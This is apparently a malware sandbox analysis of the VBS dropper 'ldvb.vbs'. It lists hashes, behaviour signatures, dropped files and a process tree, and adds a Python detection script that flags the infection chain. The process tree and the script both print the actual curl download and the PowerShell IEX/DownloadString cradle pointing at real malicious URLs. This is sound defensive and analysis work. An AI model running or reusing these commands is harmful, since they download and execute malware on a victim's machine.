Analysis

  • max time kernel
    17s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    19/11/2024, 18:25

General

  • Target

    ldvb.vbs

  • Size

    1KB

  • MD5

    eefbb9e4a9fd600d019cac1535868014

  • SHA1

    d24a2c0f2b6732bfe9de1c48e4ae6e11242948aa

  • SHA256

    9e06d175c76b3457bba2b4fbd688edcab82a5a55cff9be746d8fefbb0b637ab4

  • SHA512

    22537357f3436cfb20c97f05cc86a6b563783416a808323d6228bc7ee1c16a47ac6ee311014cdb2435d3b60e110dcbd1ff3781ae590f25a175f8d941fee84e72

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (2 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file (5 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (6 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (8 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ldvb.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\curl.exe
      "C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" "https://firebasestorage.googleapis.com/v0/b/ola445.appspot.com/o/bt?alt=media&token=a5082314-a2a5-435c-8ef5-198776034a00"
      2⤵
        PID:4620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Wins32Update_\up.cmd" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://contablebar.shop/ll2310/at3') "
          3⤵
            PID:4976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -nop -win 1
            3⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3396
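The process tree above is the detection-relevant part of this report: WScript.exe runs the .vbs, which uses the built-in curl.exe to fetch up.cmd from Firebase storage, cmd.exe runs that batch file, and the batch file pipes `echo iex (new-object net.webclient).downloadstring(...)` into `powershell.exe -nop -win 1`. The tell-tale shape is a child cmd.exe launched as `cmd /S /D /c" echo ... "` (cmd spawns a helper for the built-in `echo` side of a pipe) next to a PowerShell whose own command line carries no `-Command`, `-EncodedCommand` or `-File`: the download cradle reaches PowerShell on stdin, so command-line-only logging sees nothing but `-nop -win 1` (`-win 1` is `-WindowStyle Hidden`). The following is an added detection example, not code from the report or the sandbox vendor; the events are constructed to mirror the PIDs, images and command lines in the tree, plus one constructed benign PowerShell event as a control, and the event field names are assumed (a trimmed Sysmon Event ID 1 shape).

```python
import re
from collections import defaultdict

# Constructed process-creation events (trimmed Sysmon Event ID 1 shape, field names assumed).
# PIDs, images and command lines mirror the sandbox tree; the last event is a constructed
# benign control, not taken from the report.
EVENTS = [
    {"pid": 4204, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ldvb.vbs"'},
    {"pid": 4620, "ppid": 4204, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'"C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" '
                r'"https://firebasestorage.googleapis.com/v0/b/ola445.appspot.com/o/bt?alt=media&token=a5082314-a2a5-435c-8ef5-198776034a00"'},
    {"pid": 1624, "ppid": 4204, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Wins32Update_\up.cmd" "'},
    {"pid": 4976, "ppid": 1624, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'''C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://contablebar.shop/ll2310/at3') "'''},
    {"pid": 3396, "ppid": 1624, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -win 1"},
    {"pid": 5000, "ppid": 999, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)
# PowerShell switches that put code or a script path on the command line (common prefix forms).
PS_CODE_SWITCH = re.compile(r"\s-(?:c|command|e|ec|enc|encodedcommand|f|file)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, pid, detail) findings for the chain shown in the process tree."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cl = e["cmdline"]

        # Rule 1: a script host spawning a LOLBin downloader that writes a file to disk.
        if name in DOWNLOADERS and pname in SCRIPT_HOSTS:
            out = re.search(r'-o\s+"?([^"\s]+)', cl)
            findings.append(("script_host_downloader", e["pid"],
                             {"parent": pname, "output": out.group(1) if out else None}))

        # Rule 2: PowerShell under cmd.exe with no code on its own command line, while a
        # sibling cmd.exe echoes an IEX/DownloadString cradle.  This is the shape of
        # `echo <cradle> | powershell -nop -win 1` in a batch file: cmd needs a child
        # cmd.exe for the built-in echo, and the cradle arrives on PowerShell's stdin,
        # so the PowerShell command line alone looks harmless.
        if name == "powershell.exe" and pname == "cmd.exe" and not PS_CODE_SWITCH.search(cl):
            for s in children[e["ppid"]]:
                sc = s["cmdline"].lower()
                if (s["pid"] != e["pid"] and basename(s["image"]) == "cmd.exe"
                        and "echo" in sc and "iex" in sc and "downloadstring" in sc):
                    findings.append(("stdin_piped_iex", e["pid"], {
                        "feeder_pid": s["pid"],
                        # -win 1 / -WindowStyle Hidden; -nop / -NoProfile
                        "hidden_window": re.search(r"-w(?:in(?:dowstyle)?)?\s+(?:1|hidden)\b", cl, re.I) is not None,
                        "no_profile": re.search(r"-nop(?:rofile)?\b", cl, re.I) is not None,
                    }))
    return findings


def extract_urls(events):
    """Network IoCs to pivot on, pulled from every command line (order kept, de-duplicated)."""
    seen, urls = set(), []
    for e in events:
        for u in URL_RE.findall(e["cmdline"]):
            if u not in seen:
                seen.add(u)
                urls.append(u)
    return urls


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
    for u in extract_urls(EVENTS):
        print("url:", u)
```

Rule 2 deliberately keys on the sibling relationship rather than on the PowerShell command line, because that line is the part the technique keeps clean; to catch the cradle itself you need ScriptBlock logging (Event ID 4104), which records the stdin-fed command once it runs. Of the files listed under Downloads below, up.cmd and A are the artifacts worth pivoting on by hash; `__PSScriptPolicyTest_*.ps1` is a file PowerShell itself writes to %TEMP% at start-up to test script policy enforcement, not something the sample dropped.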

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc40hew.tf5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Wins32Update_\A

        Filesize

        297B

        MD5

        bb038fac811eadd2416418a256332a6c

        SHA1

        866257dcca41e019648a672c1f5e4be614c8aff4

        SHA256

        0aa85b2f36b77769772af83631079dbfed38d08502e1a60ae9d1a2dfffef8057

        SHA512

        ce40dd989e6e294f92fe1dced8cbb607e87c27bb5c5f8d61b1fe272a2b4a2540f3a9bcfaa36e9ec20093d2654bef78422624352ee0ab28e13a2d5c30369818d3

      • C:\Wins32Update_\up.cmd

        Filesize

        463B

        MD5

        41eba80cb324d07670a3b61881535430

        SHA1

        748ba6f8572aff7e8e443013c1f0b252e76a24c5

        SHA256

        83fa1393c1facdd3cc103be13f25a289ef56b94fd2d3d4cadb83461d76745188

        SHA512

        c7da58a768c9e7da2980bc23709bcb2a1bcaa4d50cc3e8894469f36ff0888341ce446f2c35950b5bb8fc06431279b9b58c53d01a90d524b126be5c1e80e630b1

      • memory/3396-4-0x00007FFD40BF3000-0x00007FFD40BF5000-memory.dmp

        Filesize

        8KB

      • memory/3396-11-0x0000019773FC0000-0x0000019773FE2000-memory.dmp

        Filesize

        136KB

      • memory/3396-15-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3396-16-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3396-17-0x0000019776510000-0x0000019776554000-memory.dmp

        Filesize

        272KB

      • memory/3396-18-0x00000197765E0000-0x0000019776656000-memory.dmp

        Filesize

        472KB

      • memory/3396-19-0x0000019776580000-0x000001977659E000-memory.dmp

        Filesize

        120KB

      • memory/3396-35-0x00007FFD40BF3000-0x00007FFD40BF5000-memory.dmp

        Filesize

        8KB

      • memory/3396-36-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB